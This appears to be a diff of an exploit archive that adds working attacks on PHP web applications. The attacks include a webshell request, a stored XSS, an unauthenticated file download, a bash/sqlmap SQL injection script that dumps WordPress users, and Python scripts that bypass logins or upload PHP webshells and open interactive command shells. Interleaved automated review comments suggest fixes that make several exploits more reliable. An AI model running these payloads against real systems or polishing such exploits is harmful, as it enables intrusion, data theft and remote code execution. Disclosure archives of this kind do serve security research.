/ritecms/media/webshell.php?cmd=whoami HTTP/1.1 +GET /media/(FILE-NAME).php?cmd=id HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 @@ -29,12 +28,13 @@ Connection: close Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u Upgrade-Insecure-Requests: 1 + (( RESPONSE )) HTTP/1.1 200 OK -Date: Fri, 03 Jul 2020 21:10:13 GMT +Date: Fri, 06 Jul 2020 20:02:13 GMT Server: Apache/2.4.43 (Debian) Content-Length: 14 Connection: close Content-Type: text/html; charset=UTF-8 -
www-data
\ No newline at end of file
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
\ No newline at end of file
diff --git a/exploits/php/webapps/48690.txt b/exploits/php/webapps/48690.txt
new file mode 100644
index 000000000..03e214462
--- /dev/null
+++ b/exploits/php/webapps/48690.txt
@@ -0,0 +1,16 @@
+# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
+# Author: Balzabu
+# Discovery Date: 2020-07-23
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
+# Tested Version: 4.0 (Last relase as of today)
+# Tested on OS: CentOS 7
+
+# STEPS TO REPRODUCE:
+
+# 1 - Log in as an agent
+# 2 - Write a new message to user goadmin with:
+Subject: Help me, I can't connect to the webphone 
+Text: whatever you want
+# 3 - Send and wait for goadmin to read the message... :-)
\ No newline at end of file
diff --git a/exploits/php/webapps/48698.txt b/exploits/php/webapps/48698.txt
new file mode 100644
index 000000000..45f9a3207
--- /dev/null
+++ b/exploits/php/webapps/48698.txt
@@ -0,0 +1,40 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
+# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
+# Date: 2020-07-20
+# Exploit Author: KBA@SOGETI_ESEC
+# Vendor Homepage: https://www.icegram.com/email-subscribers/
+# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
+# Version: <= 4.2.2
+# Tested on: Email Subscribers & Newsletters 4.2.2
+# CVE : CVE-2019-19985
+
+ ################################################################################################
+ #             ___         ___         ___         ___      ___                                 #
+ #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #
+ #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #
+ #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #
+ #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #
+ #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #
+ #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #
+ #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #
+ #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #
+ #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #
+ #            \/__/       \/__/       \/__/       \/__/                                         #
+ #                                                 ___         ___         ___         ___      #
+ #                                                /\  \       /\  \       /\  \       /\  \     #
+ #                                               /::\  \     /::\  \     /::\  \     /::\  \    #
+ #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #
+ # Email Subscribers & Newsletters <= 4.2.2    /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #
+ #   Unauthenticated File Download            /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
+ #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #
+ #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #
+ #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #
+ #                                               \:\__\      \::/  /     \:\__\      \:\__\     #
+ #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #
+ #                                                                                              #
+ #                                                                                              #
+ ################################################################################################
+
+
+curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
+EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
\ No newline at end of file
diff --git a/exploits/php/webapps/48699.sh b/exploits/php/webapps/48699.sh
new file mode 100755
index 000000000..d85cd4f75
--- /dev/null
+++ b/exploits/php/webapps/48699.sh
@@ -0,0 +1,127 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
+# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
+# Date: 2020-07-20
+# Exploit Author: KBAZ@SOGETI_ESEC
+# Vendor Homepage: https://www.icegram.com/email-subscribers/
+# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
+# Version: < 4.3.3
+# Tested on: Email Subscribers & Newsletters 4.2.2
+# CVE : CVE-2019-20361
+# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
+
+main () {
+	header
+	if [ "$#" -ne 1 ]; then
+			echo "Usage	: bash CVE-2019-20361.sh [BASE URL]"
+			echo "Example	: bash CVE-2019-20361.sh http://127.0.0.1/"
+			exit
+	fi
+	
+	url=$1
+	echo ' Target URL : ' "$url"
+	echo ' Generating sqlmap tamper script in /tmp'
+	gen_sqlmap_tamper
+	sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
+	echo ' SQLMap base command : ' "$sqlmap_cmd"
+
+	while true
+	do
+		 sleep 1
+		 echo ''
+		 echo " Possible choices: " 
+		 echo ''
+		 echo "  0) Exit"
+		 echo "  1) Simple vulnerability test SLEEP(5)" 
+		 echo "  2) Vulnerability test with SQLMap "
+		 echo "  3) Get WP users data"
+		 echo "  4) Get subscribers information" 
+		 echo "  5) Get 'Simple WP SMTP' settings"
+		 echo ''
+		 echo -n ' Choice number => '
+		 read n
+
+		 case $n in 
+		 0) exit ;;
+		 1) echo 'Testing SLEEP(5)...'
+				 { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;; 
+		 2) $sqlmap_cmd ;;
+		 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
+		 4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
+		 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
+		 *) echo "Invalid option" ;;
+ 		 esac 
+	done
+
+}
+
+header () {
+
+echo ''
+echo ' ################################################################################################';
+echo ' #             ___         ___         ___         ___      ___                                 #';
+echo ' #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #';
+echo ' #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #';
+echo ' #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #';
+echo ' #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #';
+echo ' #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #';
+echo ' #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #';
+echo ' #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #';
+echo ' #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #';
+echo ' #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #';
+echo ' #            \/__/       \/__/       \/__/       \/__/                                         #';
+echo ' #                                                 ___         ___         ___         ___      #';
+echo ' #                                                /\  \       /\  \       /\  \       /\  \     #';
+echo ' #                                               /::\  \     /::\  \     /::\  \     /::\  \    #';
+echo ' #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #';
+echo ' # Email Subscribers & Newsletters < 4.3.1     /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #';
+echo ' #   Unauthenticated Blind SQL Injection      /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
+echo ' #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #';
+echo ' #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #';
+echo ' #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #';
+echo ' #                                               \:\__\      \::/  /     \:\__\      \:\__\     #';
+echo ' #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #';
+echo ' #                                                                                              #';
+echo ' #                                                                                              #';
+echo ' ################################################################################################';
+echo ''
+}
+
+raw_commands () {
+
+	echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100"  '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' |  base64 -w 0
+
+		{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
+
+		sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
+
+		-T wp_users,wp_usermeta --dump 
+		-T wp_ig_contacts --dump
+		--sql-query 'select * from wp_options where option_name="swpsmtp_options"'
+
+}
+
+gen_sqlmap_tamper () {
+
+		touch /tmp/__init__.py
+
+		cat << _END > /tmp/tamper_CVE-2019-1356989.py
+#!/usr/bin/env python
+
+import base64
+import urllib
+
+def tamper(payload, **kwargs):
+
+#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
+#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
+
+	param  = '{"contact_id":"'
+	param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
+	param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
+
+	#print(param%payload)
+	return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
+_END
+}
+
+main $@
\ No newline at end of file
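Review bot: The vulnerability check at L149 greps the `time` output for `0m5,`, which only matches in locales whose decimal separator is a comma; under C/en_US locales bash prints `0m5.0xxs`, so option 1 reports `[-] Not vulnerable` regardless of the target — use `grep -qE '0m5[.,]'` or compare `date +%s` before and after the request. The tamper module is written to a fixed, predictable path `/tmp/tamper_CVE-2019-1356989.py` (L208, L210, L127) that any other local user on a shared host could pre-create, after which sqlmap would import their Python; create it under `tmpdir=$(mktemp -d)` instead. `main $@` at L230 should be `main "$@"` so a URL containing spaces or glob characters survives word splitting. In the generated tamper script, `base64.encodestring` at L226 was removed in Python 3.9; `base64.b64encode((param % payload).encode('utf-8')).decode('utf-8')` works on both Python 2 and 3 and needs no newline stripping.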
diff --git a/exploits/php/webapps/48702.txt b/exploits/php/webapps/48702.txt
new file mode 100644
index 000000000..b7e58d0dc
--- /dev/null
+++ b/exploits/php/webapps/48702.txt
@@ -0,0 +1,130 @@
+# Exploit Title: LibreHealth 2.0.0 - Authenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-07-17
+# Vendor Homepage: https://librehealth.io/
+# Software Link: https://github.com/LibreHealthIO/lh-ehr
+# Version: 2.0.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Exploit Tested Using: Python 2.7.17
+# Vulnerability Description:
+# LibreHealth v2.0.0 suffers from an authenticated file upload vulnerability allowing 
+# remote attackers to gain remote code execution (RCE) on the hosting webserver 
+# via uploading a maliciously crafted image.
+
+import requests, sys, re
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
+err  = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
+ok   = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '
+
+def webshell(SERVER_URL, WEBSHELL_FILE, session):
+    try:
+        WEB_SHELL = SERVER_URL+'sites/default/profile_pictures/'+WEBSHELL_FILE
+        print(info+"Webshell URL: "+ WEB_SHELL)
+        getdir  = {'telepathy': 'echo %CD%'}
+        r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r2.status_code
+        if status != 200:
+            print(err+"Could not connect to the webshell.")
+            r2.raise_for_status()
+        print(ok+'Successfully connected to webshell.')
+        cwd = re.findall('[CDEF].*', r2.text)
+        cwd = cwd[0]+"> "
+        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+        print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+'     WELCOME BOKU     '+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0])
+        while True:
+            thought = raw_input(term)
+            command = {'telepathy': thought}
+            r2 = requests.post(WEB_SHELL, data=command, verify=False)
+            status = r2.status_code
+            if status != 200:
+                r2.raise_for_status()
+            response2 = r2.text
+            print(response2)
+    except:
+        print('\r\n'+err+'Webshell session failed. Quitting.')
+        quit()
+
+def sig():
+    SIG  = S[3]+F[4]+".-----.._       ,--.\n"
+    SIG += F[4]+"|  ..    >  ___ |  | .--.\n"
+    SIG += F[4]+"|  |.'  ,'-\"   \"-. |/  /__   __\n"
+    SIG += F[4]+"|      < "+F[2]+"   * *"+F[4]+"   \   /   \\/   \\\n"
+    SIG += F[4]+"|  |>   )"+F[2]+" *  *  *"+F[4]+" /    \\        \\\n"
+    SIG += F[4]+"|____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n"
+    SIG += F[4]+"    _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
+    return SIG
+
+def formatHelp(STRING):
+    return S[3]+F[2]+STRING+S[0]
+
+def header():
+    head = S[3]+F[2]+'LibreHealth v2.0.0 - Authenticated Remote Code Execution (RCE)'+S[0]
+    return head
+
+if __name__ == "__main__":
+    print(header())
+    print(sig())
+#0 | Help
+    if len(sys.argv) != 4:
+        print formatHelp("(+) Usage:\t python %s   " % sys.argv[0])
+        print formatHelp("(+) Example:\t python %s 'http://172.16.65.130/LibreEHR/' 'admin' 'admin'" % sys.argv[0])
+        sys.exit(-1)
+#1 | INIT
+    USERNAME = "admin"
+    PASSWORD = "admin"
+    SERVER_URL = 'http://172.16.65.130/LibreEHR/'
+    if not re.match(r".*/$", SERVER_URL):
+        SERVER_URL = SERVER_URL+'/'
+    LOGIN_URL  = SERVER_URL+'interface/login/login.php'
+    LOGIN_POST = SERVER_URL+'interface/main/main_screen.php?auth=login&site=default'
+    UPLOAD_URL = SERVER_URL+'interface/new/new_comprehensive_save.php'
+#2 | Create Session
+    s = requests.Session()
+    get_session = s.get(LOGIN_URL, verify=False)
+    if get_session.status_code == 200:
+        print(ok+'Successfully connected to LibreHealth server & created session.')
+        print(info+"Session Cookie: "+get_session.headers['Set-Cookie'])
+    else:
+        print(err+'Cannot connect to the server and create a web session.')
+    login_data = {'new_login_session_management':'1', 'authProvider':'Default','authUser':USERNAME,'clearPass':PASSWORD,'languageChoice':'1'}
+    print(info+"Attempting to Login to LibreHealth with credentials: "+USERNAME+":"+PASSWORD)
+    auth = s.post(url=LOGIN_POST, data=login_data, verify=False, proxies=proxies)
+    loginchk  = str(re.findall(r'Calendar', auth.text))
+    if loginchk == "[u'Calendar', u'Calendar']":
+        print(ok+"Login successful.")
+    else:
+        print(err+"Failed login. Check credentials.")
+#3 | File Upload
+    PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
+    png     = {
+                'profile_picture': 
+                  (
+                    'kaio-ken.php', 
+                    PNG_magicBytes+'\n'+'', 
+                    'image/png', 
+                    {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+    fdata   = {'form_cb_1':'upload','form_fname':'Sun','form_mname':'','form_lname':'Wukong','form_sex':'Male','form_status':'','form_facility':''}
+    print(info+"Exploiting avatar file upload vulnerability to upload a PHP webshell")
+    upload_avatar = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
+#4 | Get Webshell Upload Name
+    uploadchk  = str(re.findall(r'demographics\.php\?set_pid=', upload_avatar.text))
+    if uploadchk == "[u'demographics.php?set_pid=']":
+        print(ok+"Successfully uploaded webshell")
+    else:
+        print(err+"Webshell upload failed.")
+    avatarFile = str(re.findall(r'demographics\.php\?set_pid=\d*\&', upload_avatar.text))
+    avatarFile = re.sub('^.*demographics\.php\?set_pid=', '', avatarFile)
+    avatarFile = re.sub('&.*$', '', avatarFile)
+    avatarFile = avatarFile+'.php'
+    print(info+"Webshell Filename: "+avatarFile)
+#5 | interact with webshell for Remote Command Execution
+    webshell(SERVER_URL, avatarFile, s)
\ No newline at end of file
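Review bot: The argument check at L312–L315 is not followed through — L317–L319 hard-code `USERNAME`, `PASSWORD` and `SERVER_URL` (`http://172.16.65.130/LibreEHR/`) and `sys.argv[1:]` is never read, so the script only ever talks to the author's lab host; replace those three lines with `SERVER_URL, USERNAME, PASSWORD = sys.argv[1], sys.argv[2], sys.argv[3]`. The login POST at L335 passes `proxies=proxies`, routing that single request through `127.0.0.1:8080`, which fails with a connection error unless an interception proxy happens to be listening; drop the argument or make it opt-in. Connection and login failures at L331–L332 and L339–L340 only print and then continue into the upload step, so both `else` branches need a `sys.exit(1)`. The interactive loop at L281 uses the module-level `requests.post` rather than `session.post` as L268 does, discarding the authenticated session cookies; whether the uploaded file needs them cannot be told from here, but the two calls should agree.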
diff --git a/exploits/php/webapps/48704.py b/exploits/php/webapps/48704.py
new file mode 100755
index 000000000..4222f3494
--- /dev/null
+++ b/exploits/php/webapps/48704.py
@@ -0,0 +1,113 @@
+# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
+# Date: 2020-07-15
+# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18
+
+import requests, sys, urllib, re
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
+err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
+info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
+RS   = Style.RESET_ALL
+FR   = Fore.RESET
+YL   = Fore.YELLOW
+RD   = Fore.RED
+
+def webshell(SERVER_URL, session):
+    try:
+        WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
+        getdir  = {'telepathy': 'echo %CD%'}
+        r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r2.status_code
+        if status != 200:
+            print(err+"Could not connect to the webshell.")
+            r2.raise_for_status()
+        print(ok+'Successfully connected to webshell.')
+        cwd = re.findall('[CDEF].*', r2.text)
+        cwd = cwd[0]+"> "
+        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+        print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+'     WELCOME BOKU     '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
+        while True:
+            thought = raw_input(term)
+            command = {'telepathy': thought}
+            r2 = requests.get(WEB_SHELL, params=command, verify=False)
+            status = r2.status_code
+            if status != 200:
+                r2.raise_for_status()
+            response2 = r2.text
+            print(response2)
+    except:
+        print('\r\n'+err+'Webshell session failed. Quitting.')
+        quit()
+
+def formatHelp(STRING):
+    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+def header():
+    SIG  = RD+'            /\\\n'+RS
+    SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
+    SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
+    SIG += RD+'            \/'+RS+'\n'
+    return SIG
+
+if __name__ == "__main__":
+    print(header())
+    if len(sys.argv) != 2:
+        print(formatHelp("(+) Usage:\t python %s " % sys.argv[0]))
+        print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
+        quit()
+    SERVER_URL = sys.argv[1]
+    if not re.match(r".*/$", SERVER_URL):
+        SERVER_URL = SERVER_URL+'/'
+    LOGIN_URL  = SERVER_URL+'index.php'
+    PROFILE_URL = SERVER_URL+'my-profile.php'
+    print(info+'Creating session and saving PHPSESSID')
+    s = requests.Session()
+    get_session = s.get(SERVER_URL, verify=False)
+    if get_session.status_code == 200:
+        print(ok+'Successfully connected to server and created session.')
+        print(info+get_session.headers['Set-Cookie'])
+    else:
+        print(err+'Cannot connect to the server and create a web session.')
+    bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
+    print(info+'Bypassing authentication of student login portal.')
+    auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
+    if auth_bypass.history:
+        for resp in auth_bypass.history:
+            print(info+'Response Status-Code: ' + str(resp.status_code))
+            print(info+'Location: ' + str(resp.headers['location']))
+            redirectURL = resp.headers['location']
+            if re.match(r".*change-password.php", redirectURL):
+                print(ok+'Successfully bypassed user portal authentication.')
+            else:
+                print(err+'Failed to bypass user portal authentication. Quitting.')
+                quit()
+    get_profile = s.get(url=PROFILE_URL, verify=False)
+    Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
+    Name = re.sub('^.*name="studentname" value="', '', Name)
+    Name = re.sub('".*$', '', Name)
+    PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
+    PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
+    PinCode = re.sub('".*$', '', PinCode)
+    RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
+    RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
+    RegNo = re.sub('".*$', '', RegNo)
+    print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
+    avatar_img  = {
+                'photo': 
+                  (
+                    'kaio-ken.php', 
+                    '', 
+                    'image/png', 
+                    {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+    upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
+    webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
+    print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
+    webshell(SERVER_URL, s)
\ No newline at end of file
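Review bot: The field extraction at L465–L473 converts the `re.findall` list to its `str()` repr and then regex-strips the brackets, so when a field is missing from the profile page the value silently becomes the literal `[]` and is posted back at L484–L485 as the student's name, pin or registration number. Extract each value with a capturing group and abort when it is absent, as in the helper below. The upload response at L485 is never inspected before L486 announces success, so `webshell_upload.status_code` should be checked first. L486 says the shell is driven via POST, but the loop at L412 sends `requests.get(..., params=command)` outside the session, unlike the initial POST at L399 — pick one method so the message and the code agree.
```python
def _field(html, name):
    # Pull one input value out of the profile page; abort instead of posting garbage.
    m = re.search(r'name="%s"[^>]*value="([^"]*)"' % name, html)
    if not m:
        print(err + 'Could not find form field "' + name + '" on profile page. Quitting.')
        quit()
    return m.group(1)

# … unchanged: formatHelp(), header(), argument handling, session creation, auth bypass …
    get_profile = s.get(url=PROFILE_URL, verify=False)
    Name = _field(get_profile.text, 'studentname')
    PinCode = _field(get_profile.text, 'Pincode')
    RegNo = _field(get_profile.text, 'studentregno')
```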
diff --git a/exploits/php/webapps/48705.txt b/exploits/php/webapps/48705.txt
new file mode 100644
index 000000000..6def3b344
--- /dev/null
+++ b/exploits/php/webapps/48705.txt
@@ -0,0 +1,29 @@
+# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-07-14
+# Exploit Author: BKpatron
+# Vendor Homepage:https://elaniin.com/
+# Software Link:https://github.com/elaniin/CMS/archive/master.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/elaniin/login.php
+
+POST /elaniin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+Content-Length: 334
+Referer:http://localhost/elaniin/login.php
+Cookie: PHPSESSID=33snzxs8qht0gvh0fpd27vg62
+Connection: close
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
\ No newline at end of file
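Review bot: The raw request at L511–L523 declares `Content-Type: multipart/form-data;` with no boundary at L517 while the body at L523 is URL-encoded, so replaying it verbatim will not deliver `email`/`password` to PHP's `$_POST`; the header should read `Content-Type: application/x-www-form-urlencoded`. `Content-Length: 334` at L518 also does not match the roughly 63-byte body shown, which makes a replay tool wait for bytes that never arrive, so recompute it. The advisory names `login.php` as the vulnerable file but says nothing about the fix; the root cause it describes (the `'=''or'` value closing the string in the login query) is removed by a prepared statement with bound parameters, which is the remediation worth stating for anyone verifying a patched install.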
diff --git a/exploits/php/webapps/48706.txt b/exploits/php/webapps/48706.txt
new file mode 100644
index 000000000..aa2a1d5b8
--- /dev/null
+++ b/exploits/php/webapps/48706.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
+# Date: 2020-07-15
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: http://koken.me/
+# Software Link: https://www.softaculous.com/apps/cms/Koken
+# Version: 0.22.24
+# Tested on: Linux
+# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md
+
+The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
+
+Steps to exploit:
+
+1. Create a malicious PHP file with this content:
+
+   
+
+2. Save as "image.php.jpg"
+
